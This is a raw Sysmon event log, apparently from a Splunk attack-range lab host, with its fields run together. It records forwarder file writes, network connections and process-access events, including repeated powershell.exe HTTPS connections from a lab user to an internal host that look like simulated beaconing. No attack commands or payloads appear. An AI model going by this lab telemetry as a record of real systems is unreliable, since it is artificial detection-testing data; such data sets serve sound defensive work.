AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F33F52140BAC461425C3D9ED7FD67056,SHA256=71143C5BC6D5876E4A8D2D8A876374C48F4809A6959C0EBC3EB3E2A018CE50E4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342207Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:36.573{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BDFABAAA6A9C07E32F1B975C4AF4F50,SHA256=CEF26472FB7FFAE99DBC5A630CA63F7B4822A82608220C2A29C1896BA0614725,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342206Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:01.122{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52396-false10.0.1.12-8000- 23542300x800000000000000035342208Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:37.588{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6546CC863BD07E84482DC42E7BFBCB01,SHA256=51E9AE472FACAC0758C02260A86D6594E29DA81610D2405D06F9AFF634518A44,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342209Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:38.604{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D06DE226E316E2F21EBE566EBD53C85,SHA256=A74FF14B7B203EF8ADCE63594915FE91E5595D1BA4415835D70A5D4100464523,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342211Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:39.675{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1DD0E2D560BE760D3DA28AA2C407D79,SHA256=849412BFDBD7BE7DFC1495DFB770A0BFC3283768A118F745EEE21F02F21084A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342210Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:39.172{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D488C3D8E687815B59DB1D125AD09DEF,SHA256=8AA89C67B1D982FDADED07BB9F2E785BD5A1237EA2C1CC65DDF7222B36060F9A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342213Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:40.690{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59B0E8E33B486D37F821047E473E2E41,SHA256=24716ACE959DAB18B308E1876C3C056A4D4160502926BDBE69CBE300E790E24C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342212Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:05.156{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52397-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342215Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:41.723{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0BFC06523488FE3C17DA2269B6C6F81,SHA256=E82FF7180154D7BEB28743C445D67F0EA4EDD517B9F9A9958D96AF0BB0E5A52F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342214Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:06.242{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52398-false10.0.1.12-8000- 23542300x800000000000000035342216Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:42.787{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F30EACD3FDE3819F5D3F86116CD8947E,SHA256=DBFCD86AADEDBD9870386E46E90B903B3D4301AB6A18A2239B79EDE7540D9DFA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342218Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:43.821{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9548CB7D587723E1AE6EB3BD946CA84B,SHA256=ECE5483877DF73A37EFB9BC7CEC415360964D2A45BF0B68BE2A37E4C7677A344,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342217Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:43.223{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AC6C6E0F2B29E54480E988D11CA54A0C,SHA256=4329907FFB8CB526BAD6F4868651B4847BD1DCD4D4E9DE8FFA447F6BB0CF3DB0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342221Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:44.871{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=4AE7F5ABF4717D119F8130044F593BB4,SHA256=C857270A8EDCC4183AB6CDE0BCE3084688F57936F52D03267163F0859A0471BD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342220Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:44.840{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9262496718C85D98BC188D2F56C98044,SHA256=A8AB95808704BFDFEF03063D5A4248C882424FA4574D902932DE62A789CA521C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342219Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:09.158{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52399-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342222Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:45.885{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFD19FB3B04C2D70F763B7AEC673EC58,SHA256=FDEA335B61CAEF77CD63417A14842C40093266FA4DE328CDE351C232F9CFADC3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342223Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:46.900{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E03953053547E186924DC08A0CD8FF99,SHA256=7F6E98AE5577000D38EAFDCF0016519C14F03FF9FCB2304F8114CB8E29206044,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342226Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:47.917{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F936677530FBB233BB4031876912F5DF,SHA256=3DAD01FA4C1054033CC86017D8AD71BCC0699DA4C3CF2F2E74D35A4D98C92303,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342225Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:12.138{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52400-false10.0.1.12-8000- 23542300x800000000000000035342224Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:47.184{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2F5752A52A2B74583FAD2C1A01F7C720,SHA256=8F5A1E2EEB9F422D61E51A782B85EA370AF7D811806218C4C0AC143F61C0904F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342228Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:48.950{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C5A7BC4EFB65A9BB129A26434E17868,SHA256=2EA5D1A95E600F95E28EE561032FEEA0046C9BA3D9E4C5A1ED82715DAB82D8C9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342227Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:13.169{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52401-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342229Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:49.966{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A6CCFADBB131C6515E0F585E16C07F9,SHA256=EF00EB040CD7F9999245781BE765A4AF6AA75702F9934D8296E94991E319C450,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342230Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:50.996{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DC591FD57A8F047F9E64EFB1E15818F,SHA256=79369B05C01F5975FC16CF8D0FF84E8E5E7BFB857A17E41DBF4AD1F860B8998B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342231Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:17.180{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52402-false10.0.1.12-8000- 354300x800000000000000035342234Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:18.180{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52403-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342233Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:52.279{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C1CE72BF61385053308945E464F1FBB5,SHA256=3F5D92FB56C55D604A098F97D7A482D268A5EF4770E61362E9DBEE61EE0CE9DC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342232Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:52.013{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4D2C0934109E5C3CDFCE0718D3F6D73,SHA256=994D0E2C29E9949D5FFF2E08A5945B3B7CA51B9773CBF338DBB43E7EAB644E55,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342235Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:53.067{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4365613CEF00D0FFC1DBA0C8AE1C6CB6,SHA256=0CCF8FFD01AFC377B8DF1B709E74059712C5EECD4119FC084F2D6EE64FB7553F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342236Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:54.082{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED6A34BD27BF37ED21EA06EF322BA1AB,SHA256=0D2F913CF84953D85E1DA2D654FD591427BA4D38F82A7335D78859E6E97D62B8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342237Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:55.097{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E697494F64A722C8EDC4DBDDC06A9622,SHA256=EDECD48EC7B28E492ED47D1BAAEF1A36BCEEC0913E4F4AB8C3F548CF7FB2C053,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342239Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:56.248{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=990DB6B6188325212424257C8FBA6072,SHA256=E2ADDDE8FD4CB7F4B291965EC2D20D5AE886FCBE5ECC7C30F392BE34BE059C01,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342238Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:56.113{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2DEBBA36EB092E18C67082018CB1C39,SHA256=142E907C81429CE56EDA5FC9B1BD277C196BCE512C7C6483C23386F3E3B2A109,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342242Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:23.063{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52405-false10.0.1.12-8000- 354300x800000000000000035342241Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:22.180{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52404-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342240Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:57.132{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D58FC46F9B6FB150C8F6A8B654C10DB,SHA256=909688001A1F09BB1334436872FD4480A5A5B7C6D4DF2F145CDB79BA6B7E9FD8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342243Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:58.162{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5DB181C2504C3F022C3BB627C624BB9,SHA256=18A9B980136E8DFC35CE0221FBFADA610643E9EF27F0D6E4C817B9758C0D681B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342244Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:59.210{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F88EE3A0B0C2573760877AAD03D726F,SHA256=60E7BC4ACD22BD522DDF0F526A9211FD829FEC2281B4BE28736C99C551114358,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342245Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:00.229{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=323DDDEE646DF2EA79F220A5EB9411C1,SHA256=54CD28CE2F6FC5FFE88ED30C00BFABD467C882674A67919F9D47C89F34C38EC3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342246Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:01.244{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59BD8B79D9D19F171B59FDEA147A3947,SHA256=F548C01F4F483C0B71E36FE69C05385B084B3F4FCEBA02B8E93A0ADC84D467FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342250Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:28.190{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52407-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035342249Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:28.173{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52406-false10.0.1.12-8000- 23542300x800000000000000035342248Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:02.290{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FF566D1DC8731B1A9D66261565CCB06,SHA256=7CCBE936286D0F0684E2E27069F933166D72E7943D556385717AF4F5C52884B0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342247Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:02.209{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8DDA01786A17A17EC59203646BD608DC,SHA256=E226C63DABB7DB5DC0AC856406FCFFDAF5F6529E07D0B03591E6C8FEE67976CC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342251Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:03.308{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A21ED922A3621A58B976C07368B68EBB,SHA256=F11CE47E88EE4811B92F3EE802CCD3357E8BEA28F32311046F065A1DBD3CF47A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342269Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:04.729{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-72B8-613B-2FB4-03000000C801}6484C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342268Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:04.729{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342267Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:04.729{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342266Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 